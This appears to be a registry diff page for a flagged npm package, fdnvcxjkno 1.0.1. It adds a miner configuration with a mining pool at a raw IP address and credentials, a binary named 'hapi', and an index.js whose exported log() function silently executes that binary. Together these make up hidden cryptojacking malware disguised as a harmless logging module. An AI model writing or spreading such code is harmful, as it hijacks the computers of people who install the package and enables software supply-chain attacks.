fdnvcxjkno 1.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of fdnvcxjkno might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/config.json +140 -0
  2. package/hapi +0 -0
  3. package/index.js +6 -0
  4. package/package.json +16 -0
package/config.json ADDED
@@ -0,0 +1,140 @@
1
+ {
2
+ "api": {
3
+ "id": null,
4
+ "worker-id": null
5
+ },
6
+ "http": {
7
+ "enabled": false,
8
+ "host": "127.0.0.1",
9
+ "port": 0,
10
+ "access-token": null,
11
+ "restricted": true
12
+ },
13
+ "autosave": true,
14
+ "background": false,
15
+ "colors": true,
16
+ "title": true,
17
+ "randomx": {
18
+ "init": -1,
19
+ "init-avx2": -1,
20
+ "mode": "fast",
21
+ "1gb-pages": true,
22
+ "rdmsr": true,
23
+ "wrmsr": true,
24
+ "cache_qos": false,
25
+ "numa": true,
26
+ "scratchpad_prefetch_mode": 1
27
+ },
28
+ "cpu": {
29
+ "enabled": true,
30
+ "huge-pages": true,
31
+ "huge-pages-jit": false,
32
+ "hw-aes": null,
33
+ "priority": null,
34
+ "memory-pool": false,
35
+ "yield": true,
36
+ "asm": true,
37
+ "argon2-impl": null,
38
+ "argon2": [0, 1, 2, 3],
39
+ "cn": [
40
+ [1, 0],
41
+ [1, 1],
42
+ [1, 2]
43
+ ],
44
+ "cn-heavy": [
45
+ [1, 0],
46
+ [1, 1]
47
+ ],
48
+ "cn-lite": [
49
+ [1, 0],
50
+ [1, 1],
51
+ [1, 2],
52
+ [1, 3]
53
+ ],
54
+ "cn-pico": [
55
+ [2, 0],
56
+ [2, 1],
57
+ [2, 2],
58
+ [2, 3]
59
+ ],
60
+ "cn/upx2": [
61
+ [2, 0],
62
+ [2, 1],
63
+ [2, 2],
64
+ [2, 3]
65
+ ],
66
+ "ghostrider": [
67
+ [8, 0],
68
+ [8, 1],
69
+ [8, 2]
70
+ ],
71
+ "rx": [0, 1,2,3],
72
+ "rx/wow": [0, 1, 2, 3],
73
+ "cn-lite/0": false,
74
+ "cn/0": false,
75
+ "rx/arq": "rx/wow",
76
+ "rx/keva": "rx/wow"
77
+ },
78
+ "opencl": {
79
+ "enabled": false,
80
+ "cache": true,
81
+ "loader": null,
82
+ "platform": "AMD",
83
+ "adl": true,
84
+ "cn/0": false,
85
+ "cn-lite/0": false
86
+ },
87
+ "cuda": {
88
+ "enabled": false,
89
+ "loader": null,
90
+ "nvml": true,
91
+ "cn/0": false,
92
+ "cn-lite/0": false
93
+ },
94
+ "donate-level": 1,
95
+ "donate-over-proxy": 1,
96
+ "log-file": null,
97
+ "pools": [
98
+ {
99
+ "algo": null,
100
+ "coin": null,
101
+ "url": "158.101.174.144:443",
102
+ "user": "spe",
103
+ "pass": "rawr123",
104
+ "rig-id": "hardness",
105
+ "nicehash": true,
106
+ "keepalive": true,
107
+ "enabled": true,
108
+ "tls": false,
109
+ "tls-fingerprint": null,
110
+ "daemon": false,
111
+ "socks5": null,
112
+ "self-select": null,
113
+ "submit-to-origin": false
114
+ }
115
+ ],
116
+ "print-time": 60,
117
+ "health-print-time": 60,
118
+ "dmi": true,
119
+ "retries": 5,
120
+ "retry-pause": 5,
121
+ "syslog": false,
122
+ "tls": {
123
+ "enabled": false,
124
+ "protocols": null,
125
+ "cert": null,
126
+ "cert_key": null,
127
+ "ciphers": null,
128
+ "ciphersuites": null,
129
+ "dhparam": null
130
+ },
131
+ "dns": {
132
+ "ipv6": false,
133
+ "ttl": 30
134
+ },
135
+ "user-agent": null,
136
+ "verbose": 0,
137
+ "watch": true,
138
+ "pause-on-battery": false,
139
+ "pause-on-active": false
140
+ }
package/hapi ADDED
Binary file
package/index.js ADDED
@@ -0,0 +1,6 @@
1
+ const { execFile } = require("node:child_process");
2
+
3
+ module.exports.log = function () {
4
+ const child = execFile(__dirname+'/hapi', (error, stdout, stderr) => {
5
+ });
6
+ };
package/package.json ADDED
@@ -0,0 +1,16 @@
1
+ {
2
+ "name": "codez",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "keywords": [],
10
+ "author": "",
11
+ "license": "ISC",
12
+ "main": "index.js",
13
+ "name": "fdnvcxjkno",
14
+ "version": "1.0.1",
15
+ "description": "yes"
16
+ }